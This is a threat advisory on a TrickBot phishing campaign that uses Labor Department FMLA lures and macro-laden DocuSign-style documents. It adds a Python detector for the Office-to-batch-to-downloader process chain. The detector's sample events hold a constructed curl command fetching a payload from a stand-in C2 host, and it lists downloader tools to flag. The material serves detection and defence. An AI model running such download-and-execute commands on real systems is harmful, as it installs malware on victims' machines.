TrickBot Exploited DocuSign Theme
I. Targeted Industries
- General Businesses
- Government Agencies
- Financial Institutions
- General Public
- Higher Education
- Healthcare Services
Threat actors have begun to leverage the U.S. Department of Labor’s Family and Medical Leave Act (FMLA) to spread a TrickBot Trojan amidst COVID-19 fears. TrickBot is a well-known and sophisticated banking Trojan that was developed in 2016 and has continuously evolved to evade detection. TrickBot is now being used as part of a new phishing campaign that aims to spread malware via DocuSign attachments that appear to come from the U.S. Department of Labor. These emails contain logo replicas, images, and verbiage from the Labor Department website. Malicious document files are one of the most popular ways cybercriminals distribute malware.
III. Background Information
The phishing emails carry three files: us-logo.png, faq.png, and Family and Medical Leave of Act 22.04.doc. The two .png images are taken from the Labor Department website and are displayed in the HTML email body. The DocuSign look-alike document is the malicious file that delivers TrickBot: it asks the user to enable macros, which then run the malicious script. The macro begins by creating a local directory (C:/Test) and dropping a batch file called terop.bat. terop.bat then contacts the command-and-control (C2) server, downloads a PE file, and executes it to install TrickBot. cURL is used to download the files from the C2 server, but because cURL is not available by default on Windows machines, the download fails. Even though the download fails, the IoCs confirm that this is a verified TrickBot campaign.
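As an added defender-side example (not from the advisory or any referenced vendor), a small Python detector that flags the dropper chain described above in constructed process-creation events: an Office application spawning cmd.exe to run a .bat from C:\Test, and a download utility such as curl.exe running under that Office process. The event layout, the user path, the C2 host and the payload name are constructed assumptions; only terop.bat and the C:/Test directory come from the advisory.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style, simplified);
# not real telemetry. The C2 host and payload name are placeholders.
SAMPLE_EVENTS = [
    {"pid": 4412, "ppid": 3100, "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" "C:\Users\jdoe\Downloads\Family and Medical Leave of Act 22.04.doc"'},
    {"pid": 4520, "ppid": 4412, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Test\terop.bat"'},
    {"pid": 4531, "ppid": 4520, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Test\payload.exe http://c2.example.invalid/payload.exe"},
    # Benign: an interactive cmd.exe under explorer.exe must not alert.
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5100, "ppid": 5000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir C:\Users"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe"}
# The advisory reports the batch file dropped into C:/Test; accept either separator.
BAT_IN_TEST_DIR = re.compile(r'c:[\\/]test[\\/][^\s"]+\.bat', re.IGNORECASE)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def has_office_ancestor(event, by_pid):
    """Walk the parent chain; True if any ancestor is an Office application."""
    seen = set()
    parent = by_pid.get(event["ppid"])
    while parent is not None and parent["pid"] not in seen:
        if basename(parent["image"]) in OFFICE_APPS:
            return True
        seen.add(parent["pid"])
        parent = by_pid.get(parent["ppid"])
    return False

def detect_macro_dropper_chain(events):
    """Return (pid, reason) pairs for events matching the macro -> .bat -> downloader chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        if not has_office_ancestor(e, by_pid):
            continue
        if name == "cmd.exe" and BAT_IN_TEST_DIR.search(e["cmdline"]):
            alerts.append((e["pid"], "Office-spawned cmd.exe runs a .bat from C:\\Test"))
        elif name in DOWNLOADERS:
            alerts.append((e["pid"], f"{name} launched under an Office process"))
    return alerts
```

The same two rules (Office parent plus a .bat in a staging directory, and a download utility anywhere beneath an Office process) translate directly into an EDR or SIEM process-lineage query; the downloader rule also fires when cURL is present on the host, which is the case this advisory says the campaign relies on.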
- User Awareness Training
Avoid suspicious emails, links, websites, attachments, etc. Users should be educated about new types of attacks and schemes to mitigate risk. Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
- Phishing Awareness Training
Users should be informed and educated about new kinds of phishing scams currently in use, as well as those that have been used in the past.
- Use Legitimate Sources
Make sure emails and documents come from a legitimate source, and treat grammar errors as an indicator of an illegitimate source.
- Verify Authenticity Before Downloading Anything
Avoid downloading anything from unknown sources and always verify the authenticity of the download.
- Recommended Link: https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams
V. Indicators of Compromise (IoCs)
- System files
The link below has been included to assist with the download of some identified IoCs related to this Threat Advisory Report. Be on the lookout for these IoCs, as well as anything that looks similar.